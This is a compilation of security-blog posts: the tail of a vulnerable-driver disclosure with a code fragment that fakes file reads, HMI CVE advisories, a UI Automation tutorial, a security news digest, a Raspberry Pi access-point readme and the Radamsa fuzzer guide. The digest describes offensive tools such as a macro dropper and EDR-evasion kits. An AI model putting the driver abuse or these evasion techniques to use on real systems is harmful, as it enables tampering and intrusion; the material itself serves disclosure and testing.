        printf("Faking read buffer with '*' for %ls\n", FakeReadName);
        for (unsigned int i = 0; i < Length; i++)
        {
            Buffer[i] = '*';
        }
        PrintBuffer(Buffer, Length);
        CtlUnwaitRequest(hDevice, &IOEntry->Ctrl, CurrEntry, RF_CompleteRequest);
    }

    break;
}

Fake.png

[Breaking bad]

For the sake of simplicity, all previous examples monitored the 'c:\tmp' folder. What if we want to monitor a higher-ranking directory, say, 'system32' or 'system32\config'? Easy as pie! Everything written above works for any directory in the OS; you just need to provide the path name to the CtlCreateMonitoredFolder function. The screenshot shows the output of monitoring the 'c:\windows\system32' directory:

System32.png

[EOF]

I didn’t reverse all the pre, post, and other handlers of the driver. It actually handles most, if not all, IRP_MJ_XXX requests directed to the file system, granting non-privileged users complete control over file system IO operations.

The vendor was notified about the problem approximately six months ago and has not taken action to address it. I guess they don’t care.

Update: It turns out they eventually did fix it. The vulnerability was discovered ages ago, and while I don’t remember all the details of the exposure process, I recently stumbled upon a CVE entry that describes the vulnerability. Someone, maybe even the vendor, requested the CVE ID. Here it is: https://nvd.nist.gov/vuln/detail/CVE-2020-15518.

Full code and the driver binary are available at the repository.

The Cybersecurity Skills Gap: Time to Step Up with OffSec’s Red Teaming and IoT Learning Paths

The cybersecurity landscape is challenged by a significant skills gap, with reports highlighting the critical shortage of professionals equipped to handle escalating cyber threats. The 2023 Global Cybersecurity Skills Gap Report from Fortinet underscores the urgency of this issue, revealing that a vast majority of organizations are facing more breaches due to a lack of skilled cybersecurity professionals. Specifically, the report found that 86% of decision-makers in cybersecurity recognize that the manpower shortage increases cyber risks for companies.

OffSec is on a mission to address this critical challenge with its cutting-edge Red Teaming and Internet of Things (IoT) Learning Paths. These in-depth programs transcend generic tutorials, equipping learners with the real-world skills to tackle the complex security vulnerabilities in two of today’s most targeted areas.


The post The Cybersecurity Skills Gap: Time to Step Up with OffSec’s Red Teaming and IoT Learning Paths appeared first on OffSec.

The Power of UI Automation

What if you needed to get a list of all the open browser tabs in some browser? In the (very) old days you might assume that each tab is its own window, so you could find a main browser window (using FindWindow, for example), and then enumerate child windows with EnumChildWindows to locate the tabs. Unfortunately, this approach is destined to fail. Here is a screenshot of WinSpy looking at a main window of Microsoft Edge:

MS Edge showing only two child windows

The title of the main window hints at the existence of 26 tabs, but there are only two child windows and they are not tabs. The inevitable conclusion is that the tabs are not windows at all. They are being “drawn” with some technology that the Win32 windowing infrastructure doesn’t know or care about.

How can we get information about those browsing tabs? Enter UI Automation.

UI Automation has been around for many years, starting with the older technology called “Active Accessibility”. This technology is geared towards accessibility while providing rich information that can be consumed by accessibility clients. Although Active Accessibility is still supported for compatibility reasons, a newer technology called UI Automation supersedes it.

UI Automation provides a tree of UI automation elements representing various aspects of a user interface. Some elements represent “true” Win32 windows (have HWND), some represent internal controls like buttons and edit boxes (created with whatever technology), and some elements are virtual (don’t have any graphical aspects), but instead provide “metadata” related to other items.

The UI Automation client API uses COM, where the root object implements the IUIAutomation interface (extended interfaces exist as well). To get the automation object, the following C++ code can be used (we’ll see a C# example later):

CComPtr<IUIAutomation> spUI;
auto hr = spUI.CoCreateInstance(__uuidof(CUIAutomation));
if (FAILED(hr))
	return Error("Failed to create Automation root", hr);

The client automation interfaces are declared in <UIAutomationClient.h>. The code uses the ATL CComPtr<> smart pointers, but any COM smart or raw pointers will do.

With the UI Automation object pointer in hand, several options are available. One is to enumerate the full or part of the UI element tree. To get started, we can obtain a “walker” object by calling IUIAutomation::get_RawViewWalker. From there, we can start enumerating by calling IUIAutomationTreeWalker interface methods, like GetFirstChildElement and GetNextSiblingElement.

Each element, represented by an IUIAutomationElement interface, provides a set of properties, some available directly on the interface (e.g. get_CurrentName, get_CurrentClassName, get_CurrentProcessId), while others hide behind a generic method, get_CurrentPropertyValue, where each property has an integer ID, and the result is a VARIANT, to allow for various types of values.

Using this method, the menu item View Automation Tree in WinSpy shows the full automation tree, and you can drill down to any level, while many of the selected element’s properties are shown on the right:

WinSpy automation tree view

If you dig deep enough, you’ll find that MS Edge tabs have a UI automation class name of “EdgeTab”. This is the key to locating browser tabs. (Other browsers may use a different class name.) To find tabs, we could enumerate the full tree manually, but fortunately there is a better way: IUIAutomationElement has a FindAll method that searches for elements based on a set of conditions. The available conditions are pretty flexible – based on one or more properties of elements, which can be combined with And, Or, etc. to build more complex conditions. In our case, we just need one condition – a class name equal to “EdgeTab”.

First, we’ll create the root object, and the condition (error handling omitted for brevity):

int main() {
	::CoInitialize(nullptr);

	CComPtr<IUIAutomation> spUI;
	auto hr = spUI.CoCreateInstance(__uuidof(CUIAutomation));

	CComPtr<IUIAutomationCondition> spCond;
	CComVariant edgeTab(L"EdgeTab");
	spUI->CreatePropertyCondition(UIA_ClassNamePropertyId, edgeTab, &spCond);

We have a single condition for the class name property, which has an ID defined in the automation headers. Next, we’ll fire off the search from the root element (desktop):

CComPtr<IUIAutomationElementArray> spTabs;
CComPtr<IUIAutomationElement> spRoot;
spUI->GetRootElement(&spRoot);
hr = spRoot->FindAll(TreeScope_Descendants, spCond, &spTabs);

All that’s left to do is harvest the results:

int count = 0;
spTabs->get_Length(&count);
for (int i = 0; i < count; i++) {
	CComPtr<IUIAutomationElement> spTab;
	spTabs->GetElement(i, &spTab);
	CComBSTR name;
	spTab->get_CurrentName(&name);
	int pid;
	spTab->get_CurrentProcessId(&pid);
	printf("%2d PID %6d: %ws\n", i + 1, pid, name.m_str);
}

Try it!

.NET Code

A convenient NuGet package called Interop.UIAutomationClient.Signed provides wrappers for the automation API for .NET clients. Here is the same search done in C# after adding the NuGet package reference:

static void Main(string[] args) {
    const int ClassPropertyId = 30012;
    var ui = new CUIAutomationClass();
    var cond = ui.CreatePropertyCondition(ClassPropertyId, "EdgeTab");
    var tabs = ui.GetRootElement().FindAll(TreeScope.TreeScope_Descendants, cond);
    for (int i = 0; i < tabs.Length; i++) {
        var tab = tabs.GetElement(i);
        Console.WriteLine($"{i + 1,2} PID {tab.CurrentProcessId,6}: {tab.CurrentName}");
    }
}

More Automation

There is a lot more to UI automation – the word “automation” implies some more control. One capability of the API is providing various notifications when certain aspects of elements change. Examples include the IUIAutomation methods AddAutomationEventHandler, AddFocusChangedEventHandler, AddPropertyChangedEventHandler, and AddStructureChangedEventHandler.

More specific information on elements (and some control) is also available via more specific interfaces related to controls, such as IUIAutomationTextPattern, IUIAutomationTextRange, and many more.

Happy automation!

CVE-2024-25138

CWE-256: Plaintext Storage of a Password

In AutomationDirect C-MORE EA9 HMI, credentials used by the platform are stored as plain text on the device.

AutomationDirect recommends that users update C-MORE EA9 HMI to V6.78.

Affected versions:

  • C-MORE EA9 HMI EA9-T6CL: Version 6.77 and prior
  • C-MORE EA9 HMI EA9-T7CL: Version 6.77 and prior
  • C-MORE EA9 HMI EA0-T7CL-R: Version 6.77 and prior
  • C-MORE EA9 HMI EA9-T8CL: Version 6.77 and prior
  • C-MORE EA9 HMI EA9-T10CL: Version 6.77 and prior
  • C-MORE EA9 HMI EA9-T10WCL: Version 6.77 and prior
  • C-MORE EA9 HMI EA9-T12CL: Version 6.77 and prior
  • C-MORE EA9 HMI EA9-T15CL: Version 6.77 and prior
  • C-MORE EA9 HMI EA9-T15CL-R: Version 6.77 and prior
  • C-MORE EA9 HMI EA9-RHMI: Version 6.77 and prior
  • C-MORE EA9 HMI EA9-PGMSW: Version 6.77 and prior

CVE-2024-25137

CWE-121: Stack-based Buffer Overflow

In AutomationDirect C-MORE EA9 HMI, a program copies a buffer of a size controlled by the user into a limited-size buffer on the stack, leading to a stack-based buffer overflow. The result is a denial-of-service condition.

AutomationDirect recommends that users update C-MORE EA9 HMI to V6.78.

Affected versions:

  • C-MORE EA9 HMI EA9-T6CL: Version 6.77 and prior
  • C-MORE EA9 HMI EA9-T7CL: Version 6.77 and prior
  • C-MORE EA9 HMI EA0-T7CL-R: Version 6.77 and prior
  • C-MORE EA9 HMI EA9-T8CL: Version 6.77 and prior
  • C-MORE EA9 HMI EA9-T10CL: Version 6.77 and prior
  • C-MORE EA9 HMI EA9-T10WCL: Version 6.77 and prior
  • C-MORE EA9 HMI EA9-T12CL: Version 6.77 and prior
  • C-MORE EA9 HMI EA9-T15CL: Version 6.77 and prior
  • C-MORE EA9 HMI EA9-T15CL-R: Version 6.77 and prior
  • C-MORE EA9 HMI EA9-RHMI: Version 6.77 and prior
  • C-MORE EA9 HMI EA9-PGMSW: Version 6.77 and prior

CVE-2024-25136

CWE-22: Improper Limitation of a Pathname to a Restricted Directory ('Path Traversal')

A function in AutomationDirect C-MORE EA9 HMI allows an attacker to send a relative path in the URL without proper sanitization of the content.

AutomationDirect recommends that users update C-MORE EA9 HMI to V6.78.

Affected versions:

  • C-MORE EA9 HMI EA9-T6CL: Version 6.77 and prior
  • C-MORE EA9 HMI EA9-T7CL: Version 6.77 and prior
  • C-MORE EA9 HMI EA0-T7CL-R: Version 6.77 and prior
  • C-MORE EA9 HMI EA9-T8CL: Version 6.77 and prior
  • C-MORE EA9 HMI EA9-T10CL: Version 6.77 and prior
  • C-MORE EA9 HMI EA9-T10WCL: Version 6.77 and prior
  • C-MORE EA9 HMI EA9-T12CL: Version 6.77 and prior
  • C-MORE EA9 HMI EA9-T15CL: Version 6.77 and prior
  • C-MORE EA9 HMI EA9-T15CL-R: Version 6.77 and prior
  • C-MORE EA9 HMI EA9-RHMI: Version 6.77 and prior
  • C-MORE EA9 HMI EA9-PGMSW: Version 6.77 and prior

AutoWLAN - Run A Portable Access Point On A Raspberry Pi Making Use Of Docker Containers


This project allows you to run a portable access point on a Raspberry Pi making use of Docker containers.

Further reference and explanations:

https://fwhibbit.es/en/automatic-access-point-with-docker-and-raspberry-pi-zero-w

Tested on Raspberry Pi Zero W.


Access point configurations

You can customize the network password and other configurations on files at confs/hostapd_confs/. You can also add your own hostapd configuration files here.
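For illustration, a minimal WPA2 hostapd configuration of the kind these files contain might look like the sketch below. All values here are illustrative placeholders, not the repository's actual defaults:

```
# Illustrative hostapd WPA2-PSK configuration (placeholder values)
interface=wlan0
driver=nl80211
ssid=autowlan
hw_mode=g
channel=6
wpa=2
wpa_key_mgmt=WPA-PSK
rsn_pairwise=CCMP
wpa_passphrase=ChangeMe123
```

Dropping a file like this into confs/hostapd_confs/ and mounting it over /etc/hostapd/hostapd.conf, as the docker run examples below do, is how the different security modes are selected.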

Management using plain docker

Add --rm for volatile containers.

Create and run a container with default (Open) configuration (stop with Ctrl+C)
docker run --name autowlan_open --cap-add=NET_ADMIN --network=host  autowlan
Create and run a container with WEP configuration (stop with Ctrl+C)
docker run --name autowlan_wep --cap-add=NET_ADMIN --network=host -v $(pwd)/confs/hostapd_confs/wep.conf:/etc/hostapd/hostapd.conf autowlan
Create and run a container with WPA2 configuration (stop with Ctrl+C)
docker run --name autowlan_wpa2 --cap-add=NET_ADMIN --network=host -v $(pwd)/confs/hostapd_confs/wpa2.conf:/etc/hostapd/hostapd.conf autowlan
Stop a running container
docker stop autowlan_{open|wep|wpa2}

Management using docker-compose

Create and run a container (stop with Ctrl+C)
docker-compose -f <yml_file> up
Create and run a container in the background
docker-compose -f <yml_file> up -d
Stop a container running in the background
docker-compose -f <yml_file> down
Read logs of a container running in the background
docker-compose -f <yml_file> logs


Last Week in Security (LWiS) - 2024-03-25

Last Week in Security is a summary of the interesting cybersecurity news, techniques, tools and exploits from the past week. This post covers 2024-03-18 to 2024-03-25.

News

  • Unveiling malware behavior trends - Analyzing a Windows dataset of over 100,000 malicious files by Elastic Security Labs.
  • Introducing STAR-FS - The Bank of England announced the introduction of a new regulatory framework, STAR-FS, to support the financial sector in its cyber resilience operations.
  • GoFetch - A new vulnerability baked into Apple's M-series of chips that allows attackers (and/or userspace applications) to extract secret keys from Macs. It looks like there are mitigation flags that can be set to mitigate this for sensitive cryptographic calls. Time will tell if they are effective/implemented.
  • The US Department of Justice is suing Apple — read the full lawsuit here - Will this lead to a more open iOS? Maybe, but it will be years before anything (if anything) changes.

Techniques and Write-ups

Tools and Exploits

  • WhoIsWho - Alternatives to the command whoami
  • dropper - Generates a malicious Office macro-enabled dropper for DLL sideloading and embeds it in an LNK file to bypass MotW.
  • Perfect DLL Proxy - Perfect DLL Proxying using forwards with absolute paths. [I'm partial to Spartacus]
  • Jigsaw - Hide shellcode by shuffling bytes into a random array and reconstruct at runtime
  • IoDllProxyLoad - DLL proxy load example using the Windows thread pool API, I/O completion callback with named pipes, and C++/assembly
  • OpenTIDE - Open Threat Informed Detection Engineering is the European Commission DIGIT.S2 (Security Operations) open source initiative to build a rich ecosystem of tooling and data supporting Cyber Threat Detections.
  • HttpRemotingObjRefLeak - Additional resources for leaking and exploiting ObjRefs via HTTP .NET Remoting CVE-2024-29059.
  • Pwned by the Mail Carrier - Compromising exchange with some defensive guidance on adjusting ACEs to limit Exchange's AD permissions and establishing security boundaries for Tier Zero assets. Jonas is on a tear lately.
  • Another Dll Proxying Tool - DLL proxying for lazy people
  • nimvoke - Indirect syscalls + DInvoke made simple.
  • ActionsCacheBlasting - Proof-of-concept code for research into GitHub Actions Cache poisoning.
  • CVE-2023-36424 - Windows Kernel Pool (clfs.sys) Corruption Privilege Escalation.

New to Me and Miscellaneous

This section is for news, techniques, write-ups, tools, and off-topic items that weren't released last week but are new to me. Perhaps you missed them too!

  • SO-CON 2024 - SO-CON 2024 presentations released. Videos coming soon!
  • The Top 100+ Developer Tools 2023 - Looking for a research target inspiration? "This year we analyzed well over 12 million data points shared by you - the StackShare community - to bring you these rankings."
  • Devika - Devika is an Agentic AI Software Engineer that can understand high-level human instructions, break them down into steps, research relevant information, and write code to achieve the given objective. Devika aims to be a competitive open-source alternative to Devin by Cognition AI.
  • VoiceCraft: Zero-Shot Speech Editing and Text-to-Speech in the Wild - VoiceCraft is a token infilling neural codec language model, that achieves state-of-the-art performance on both speech editing and zero-shot text-to-speech (TTS) on in-the-wild data including audiobooks, internet videos, and podcasts. The model weights aren't out yet but should be by the end of the month. This is going to make vishing deadly.
  • lumentis - AI powered one-click comprehensive docs from transcripts and text.
  • Cobalt Strike Resources - Various resources to enhance Cobalt Strike's functionality and its ability to evade antivirus/EDR detection.
  • bincapz - Enumerate binary capabilities, including malicious behaviors.
  • Mutual TLS (mTLS) Go client - How to build an mTLS Go client that uses the Windows certificate store.
  • Windows vs Linux Loader Architecture - Side-by-side comparison of the Windows and Linux (GNU) Loaders.
  • Twikit - Simple API wrapper to interact with twitter's unofficial API. You can log in to Twitter using your account username, email address and password and use most features on Twitter, such as posting and retrieving tweets, liking and following users. Curious on how long this will last.
  • tracecat - 😼 The AI-native, open source alternative to Tines / Splunk SOAR.

Techniques, tools, and exploits linked in this post are not reviewed for quality or safety. Do your own research and testing.

IT-Notfallkarte

An emergency strikes. What should be done now?

Emergency cards provide guidance in uncertain or critical situations. With HanseSecure's IT EMERGENCY CARD, every user receives a compact set of instructions to act on.

It also immediately raises the company's security awareness. Guided action gives users confidence, directly protects them and others from further poor decisions, and can prevent the consequences from spreading.

IT emergencies in particular call for direct, guided instructions in order to prevent far-reaching consequences. Beyond that, it is important to take away the fear of making mistakes, to raise awareness, and to encourage the reporting of anomalies. The IT EMERGENCY CARD should therefore be displayed visibly in every office and introduced with a short explanation.

The post IT-Notfallkarte appeared first on HanseSecure GmbH.

Horizon3.ai Garners Spot in 2024 CRN® Partner Program Guide

Business Wire 03/25/2024

Horizon3.ai, a pioneer in autonomous security solutions, has been honored by CRN®, a brand of The Channel Company, with inclusion in its 2024 Partner Program Guide. This annual guide provides essential information to solution providers exploring technology vendor partner programs…


The post Horizon3.ai Garners Spot in 2024 CRN® Partner Program Guide appeared first on Horizon3.ai.

Radamsa - A General-Purpose Fuzzer


Radamsa is a test case generator for robustness testing, a.k.a. a fuzzer. It is typically used to test how well a program can withstand malformed and potentially malicious inputs. It works by reading sample files of valid data and generating interestingly different outputs from them. The main selling points of radamsa are that it has already found a slew of bugs in programs that actually matter, it is easily scriptable, and it is easy to get up and running.


Nutshell:

 $ # please please please fuzz your programs. here is one way to get data for it:
$ sudo apt-get install gcc make git wget
$ git clone https://gitlab.com/akihe/radamsa.git && cd radamsa && make && sudo make install
$ echo "HAL 9000" | radamsa

What the Fuzz

Programming is hard. All nontrivial programs have bugs in them. What's more, in some of the most widely used programming languages even the simplest typical mistakes are usually enough for attackers to gain undesired powers.

Fuzzing is one of the techniques to find such unexpected behavior in programs. The idea is simply to subject the program to various kinds of inputs and see what happens. There are two parts to this process: generating the various kinds of inputs, and seeing what happens. Radamsa is a solution to the first part, and the second part is typically a short shell script. Testers usually have a more or less vague idea of what should not happen, and they try to find out whether this holds. This kind of testing is often referred to as negative testing, being the opposite of positive unit or integration testing. Developers know a service should not crash, should not consume exponential amounts of memory, should not get stuck in an infinite loop, etc. Attackers know that they can probably turn certain kinds of memory safety bugs into exploits, so they typically fuzz instrumented versions of the target programs and wait for such errors to be found. In theory, the idea is to disprove, by finding a counterexample, a theorem about the program stating that for all inputs something doesn't happen.
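The "see what happens" part can start as small as an exit-status check. Here is a minimal negative-test sketch against gzip, with no fuzzer involved yet (the invalid input is just a made-up string):

```shell
#!/bin/sh
# Hand gzip deliberately invalid data and inspect the failure mode.
# A nonzero exit status up to 127 is a clean, handled error; anything
# above 127 would mean the process died on a fatal signal.
printf 'not a gzip stream' | gzip -d > /dev/null 2>&1
status=$?
echo "gzip exit status: $status"
if [ "$status" -gt 0 ] && [ "$status" -le 127 ]; then
    echo "clean error, no crash"
fi
```

The same skeleton works for any target: swap the input generator for a fuzzer and the test command for the program under test.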

There are many kinds of fuzzers and ways to apply them. Some trace the target program and generate test cases based on the observed behavior. Some need to know the format of the data and generate test cases based on that information. Radamsa is an extremely "black-box" fuzzer, because it needs no information about the program nor the format of the data. One can pair it with coverage analysis during testing to improve the quality of the sample set over a continuous test run, but this is not mandatory. The main goal is to first get tests running easily, and then refine the technique applied if necessary.

Radamsa is intended to be a good general purpose fuzzer for all kinds of data. The goal is to be able to find issues no matter what kind of data the program processes, whether it's XML or MP3, and conversely that not finding bugs implies that other similar tools likely won't find them either. This is accomplished by having various kinds of heuristics and change patterns, which are varied during the tests. Sometimes there is just one change, sometimes a slew of them; sometimes bit flips, sometimes something more advanced and novel.

Radamsa is a side-product of OUSPG's Protos Genome Project, in which some techniques to automatically analyze and examine the structure of communication protocols were explored. A subset of one of the tools turned out to be a surprisingly effective file fuzzer. The first prototype black-box fuzzer tools mainly used regular and context-free formal languages to represent the inferred model of the data.

Requirements

Supported operating systems:

  • GNU/Linux
  • OpenBSD
  • FreeBSD
  • Mac OS X
  • Windows (using Cygwin)

Software requirements for building from sources:

  • gcc / clang
  • make
  • git
  • wget

Building Radamsa

 $ git clone https://gitlab.com/akihe/radamsa.git
$ cd radamsa
$ make
$ sudo make install # optional, you can also just grab bin/radamsa
$ radamsa --help

Radamsa itself is just a single binary file which has no external dependencies. You can move it where you please and remove the rest.

Fuzzing with Radamsa

This section assumes some familiarity with UNIX scripting.

Radamsa can be thought of as the cat UNIX tool, which manages to break the data in often interesting ways as it flows through. It also has support for generating more than one output at a time and acting as a TCP server or client, in case such things are needed.

Use of radamsa will be demonstrated by means of small examples. We will use the bc arbitrary precision calculator as an example target program.

In the simplest case, from a scripting point of view, radamsa can be used to fuzz data going through a pipe.

 $ echo "aaa" | radamsa
aaaa

Here radamsa decided to add one 'a' to the input. Let's try that again.

 $ echo "aaa" | radamsa
ːaaa

Now we got another result. By default radamsa will grab a random seed from /dev/urandom if it is not given a specific random state to start from, and you will generally see a different result every time it is started, though for small inputs you might see the same or the original fairly often. The random state to use can be given with the -s parameter, which is followed by a number. Using the same random state will result in the same data being generated.

 $ echo "Fuzztron 2000" | radamsa --seed 4
Fuzztron 4294967296

This particular example was chosen because radamsa happened to use a number mutator, which replaces textual numbers with something else. Programmers might recognize why, for example, this particular number might be an interesting one to test for.

You can generate more than one output by using the -n parameter as follows:

 $ echo "1 + (2 + (3 + 4))" | radamsa --seed 12 -n 4
1 + (2 + (2 + (3 + 4?)
1 + (2 + (3 +?4))
18446744073709551615 + 4)))
1 + (2 + (3 + 170141183460469231731687303715884105727))

There is no guarantee that all of the outputs will be unique. However, when using nontrivial samples, equal outputs tend to be extremely rare.

What we have so far can be used, for example, to test programs that read input from standard input, as in

 $ echo "100 * (1 + (2 / 3))" | radamsa -n 10000 | bc
[...]
(standard_in) 1418: illegal character: ^_
(standard_in) 1422: syntax error
(standard_in) 1424: syntax error
(standard_in) 1424: memory exhausted
[hang]

Or the compiler used to compile Radamsa:

 $ echo '((lambda (x) (+ x 1)) #x124214214)' | radamsa -n 10000 | ol
[...]
> What is 'ó µ'?
4901126677
> $

Or to test decompression:

 $ gzip -c /bin/bash | radamsa -n 1000 | gzip -d > /dev/null

Typically however one might want separate runs for the program for each output. Basic shell scripting makes this easy. Usually we want a test script to run continuously, so we'll use an infinite loop here:

 $ gzip -c /bin/bash > sample.gz
$ while true; do radamsa sample.gz | gzip -d > /dev/null; done

Notice that we are here giving the sample as a file instead of running Radamsa in a pipe. Like cat, Radamsa will by default write the output to stdout, but unlike cat, when given more than one file it will usually use only one or a few of them to create one output. This test will keep throwing fuzzed data at gzip, but doesn't care what happens then. One simple way to find out whether something bad happened to a (simple, single-threaded) program is to check whether the exit value is greater than 127, which would indicate a fatal program termination. This can be done for example as follows:

 $ gzip -c /bin/bash > sample.gz
$ while true
do
radamsa sample.gz > fuzzed.gz
gzip -dc fuzzed.gz > /dev/null
test $? -gt 127 && break
done

This will run for as long as it takes to crash gzip, which hopefully is no longer even possible, and the fuzzed.gz can be used to check the issue if the script has stopped. We have found a few such cases, the last one of which took about 3 months to find, but all of them have as usual been filed as bugs and have been promptly fixed by the upstream.
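As an aside, the "greater than 127" check works because POSIX shells report a process killed by signal N with an exit status of 128+N. A quick sanity check of the convention, independent of radamsa:

```shell
#!/bin/sh
# A child process that kills itself with SIGSEGV (signal 11) should be
# reported by the parent shell with exit status 128 + 11 = 139.
sh -c 'kill -s SEGV $$'
status=$?
echo "exit status: $status"
if [ "$status" -gt 127 ]; then
    echo "fatal signal: $((status - 128))"
fi
```

This prints "exit status: 139" and "fatal signal: 11", which is exactly the condition the test scripts above break on.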

One thing to note is that since most of the outputs are based on data in the given samples (standard input or files given on the command line), it is usually a good idea to try to find good samples, and preferably more than one of them. In a more real-world test script, radamsa will usually be used to generate many outputs at a time based on tens or thousands of samples, and the consequences of the outputs are tested mostly in parallel, often by giving each of the outputs on the command line to the target program. We'll make a simple such script for bc, which accepts files from the command line. The -o flag can be used to give a file name to which radamsa should write the output instead of standard output. If more than one output is generated, the path should have a %n in it, which will be expanded to the number of the output.

 $ echo "1 + 2" > sample-1
$ echo "(124 % 7) ^ 1*2" > sample-2
$ echo "sqrt((1 + length(10^4)) * 5)" > sample-3
$ bc sample-* < /dev/null
3
10
5
$ while true
do
radamsa -o fuzz-%n -n 100 sample-*
bc fuzz-* < /dev/null
test $? -gt 127 && break
done

This will again run until an obviously interesting event, indicated by a large exit value, or until the target program gets stuck.

In practice many programs fail in unique ways. Some common ways to catch obvious errors are to check the exit value, enable fatal signal printing in kernel and checking if something new turns up in dmesg, run a program under strace, gdb or valgrind and see if something interesting is caught, check if an error reporter process has been started after starting the program, etc.
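The exit-status check from the earlier loops can be extended to archive the offending input for later analysis. Below is a harness sketch along those lines; note that the `mutate` function here is a trivial placeholder standing in for a real `radamsa sample.gz` invocation:

```shell
#!/bin/sh
# Harness sketch: keep any input that makes the target die fatally.
# `mutate` is a placeholder for `radamsa sample.gz`; the real tool
# would produce a different mutation on every call.
gzip -c /bin/sh > sample.gz
mutate() { cat sample.gz; printf '\377'; }   # stand-in mutator
i=0
while [ $i -lt 5 ]; do
    mutate > fuzzed.gz
    gzip -dc fuzzed.gz > /dev/null 2>&1
    if [ $? -gt 127 ]; then
        cp fuzzed.gz "crash-$i.gz"           # archive the offending input
        echo "fatal termination archived: crash-$i.gz"
    fi
    i=$((i + 1))
done
echo "done after $i iterations"
```

Keeping the crashing file around is what makes the run reproducible: the archived input can be replayed against the target under gdb or valgrind afterwards.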

Output Options

The examples above all either wrote to standard output or files. One can also ask radamsa to be a TCP client or server by using a special parameter to -o. The output patterns are:

-o argument   meaning                                                          example
:port         act as a TCP server on the given port                            $ radamsa -o :80 -n inf samples/*.http-resp
ip:port       connect as a TCP client to the given port of ip                  $ radamsa -o 127.0.0.1:80 -n inf samples/*.http-req
-             write to stdout                                                  $ radamsa -o - samples/*.vt100
path          write to files; %n is the testcase number, %s the first suffix   $ radamsa -o test-%n.%s -n 100 samples/*.foo

Remember that you can use e.g. tcpflow to record TCP traffic to files, which can then be used as samples for radamsa.

Related Tools

A non-exhaustive list of free complementary tools:

  • GDB (http://www.gnu.org/software/gdb/)
  • Valgrind (http://valgrind.org/)
  • AddressSanitizer (http://code.google.com/p/address-sanitizer/wiki/AddressSanitizer)
  • strace (http://sourceforge.net/projects/strace/)
  • tcpflow (http://www.circlemud.org/~jelson/software/tcpflow/)

A non-exhaustive list of related free tools:

  • American fuzzy lop (http://lcamtuf.coredump.cx/afl/)
  • Zzuf (http://caca.zoy.org/wiki/zzuf)
  • Bunny the Fuzzer (http://code.google.com/p/bunny-the-fuzzer/)
  • Peach (http://peachfuzzer.com/)
  • Sulley (http://code.google.com/p/sulley/)

Tools which are intended to improve security are usually complementary and should be used in parallel to improve the results. Radamsa aims to be an easy-to-set-up general purpose shotgun test to expose the easiest (and often severe, due to being reachable via input streams) cracks which might be exploitable by getting the program to process malicious data. It has also turned out to be useful for catching regressions when combined with continuous automatic testing.

Some Known Results

A robustness testing tool is obviously only good if it really can find non-trivial issues in real-world programs. Being a University-based group, we have tried to formulate some more scientific approaches to define what a 'good fuzzer' is, but real users are more likely to be interested in whether a tool has found something useful. We do not have anyone at OUSPG running tests or even developing Radamsa full-time, but we obviously do make occasional test-runs, both to assess the usefulness of the tool and to help improve the robustness of the target programs. For the test-runs we try to select programs that are mature, useful to us, widely used, preferably open source, and that tend to process data from outside sources.

The list below has some CVEs we know of that have been found by using Radamsa. Some of the results are from our own test runs, and some have been kindly provided by CERT-FI from their tests and by other users. As usual, please note that CVEs should be read as 'product X is now more robust (against Y)'.

CVE program credit
CVE-2007-3641 libarchive OUSPG
CVE-2007-3644 libarchive OUSPG
CVE-2007-3645 libarchive OUSPG
CVE-2008-1372 bzip2 OUSPG
CVE-2008-1387 ClamAV OUSPG
CVE-2008-1412 F-Secure OUSPG
CVE-2008-1837 ClamAV OUSPG
CVE-2008-6536 7-zip OUSPG
CVE-2008-6903 Sophos Anti-Virus OUSPG
CVE-2010-0001 Gzip integer underflow in unlzw
CVE-2010-0192 Acroread OUSPG
CVE-2010-1205 libpng OUSPG
CVE-2010-1410 Webkit OUSPG
CVE-2010-1415 Webkit OUSPG
CVE-2010-1793 Webkit OUSPG
CVE-2010-2065 libtiff found by CERT-FI
CVE-2010-2443 libtiff found by CERT-FI
CVE-2010-2597 libtiff found by CERT-FI
CVE-2010-2482 libtiff found by CERT-FI
CVE-2011-0522 VLC found by Harry Sintonen
CVE-2011-0181 Apple ImageIO found by Harry Sintonen
CVE-2011-0198 Apple Type Services found by Harry Sintonen
CVE-2011-0205 Apple ImageIO found by Harry Sintonen
CVE-2011-0201 Apple CoreFoundation found by Harry Sintonen
CVE-2011-1276 Excel found by Nicolas Grégoire of Agarri
CVE-2011-1186 Chrome OUSPG
CVE-2011-1434 Chrome OUSPG
CVE-2011-2348 Chrome OUSPG
CVE-2011-2804 Chrome/pdf OUSPG
CVE-2011-2830 Chrome/pdf OUSPG
CVE-2011-2839 Chrome/pdf OUSPG
CVE-2011-2861 Chrome/pdf OUSPG
CVE-2011-3146 librsvg found by Sauli Pahlman
CVE-2011-3654 Mozilla Firefox OUSPG
CVE-2011-3892 Theora OUSPG
CVE-2011-3893 Chrome OUSPG
CVE-2011-3895 FFmpeg OUSPG
CVE-2011-3957 Chrome OUSPG
CVE-2011-3959 Chrome OUSPG
CVE-2011-3960 Chrome OUSPG
CVE-2011-3962 Chrome OUSPG
CVE-2011-3966 Chrome OUSPG
CVE-2011-3970 libxslt OUSPG
CVE-2012-0449 Firefox found by Nicolas Grégoire of Agarri
CVE-2012-0469 Mozilla Firefox OUSPG
CVE-2012-0470 Mozilla Firefox OUSPG
CVE-2012-0457 Mozilla Firefox OUSPG
CVE-2012-2825 libxslt found by Nicolas Grégoire of Agarri
CVE-2012-2849 Chrome/GIF OUSPG
CVE-2012-3972 Mozilla Firefox found by Nicolas Grégoire of Agarri
CVE-2012-1525 Acrobat Reader found by Nicolas Grégoire of Agarri
CVE-2012-2871 libxslt found by Nicolas Grégoire of Agarri
CVE-2012-2870 libxslt found by Nicolas Grégoire of Agarri
CVE-2012-2870 libxslt found by Nicolas Grégoire of Agarri
CVE-2012-4922 tor found by the Tor project
CVE-2012-5108 Chrome OUSPG via NodeFuzz
CVE-2012-2887 Chrome OUSPG via NodeFuzz
CVE-2012-5120 Chrome OUSPG via NodeFuzz
CVE-2012-5121 Chrome OUSPG via NodeFuzz
CVE-2012-5145 Chrome OUSPG via NodeFuzz
CVE-2012-4186 Mozilla Firefox OUSPG via NodeFuzz
CVE-2012-4187 Mozilla Firefox OUSPG via NodeFuzz
CVE-2012-4188 Mozilla Firefox OUSPG via NodeFuzz
CVE-2012-4202 Mozilla Firefox OUSPG via NodeFuzz
CVE-2013-0744 Mozilla Firefox OUSPG via NodeFuzz
CVE-2013-1691 Mozilla Firefox OUSPG
CVE-2013-1708 Mozilla Firefox OUSPG
CVE-2013-4082 Wireshark found by cons0ul
CVE-2013-1732 Mozilla Firefox OUSPG
CVE-2014-0526 Adobe Reader X/XI Pedro Ribeiro ([email protected])
CVE-2014-3669 PHP
CVE-2014-3668 PHP
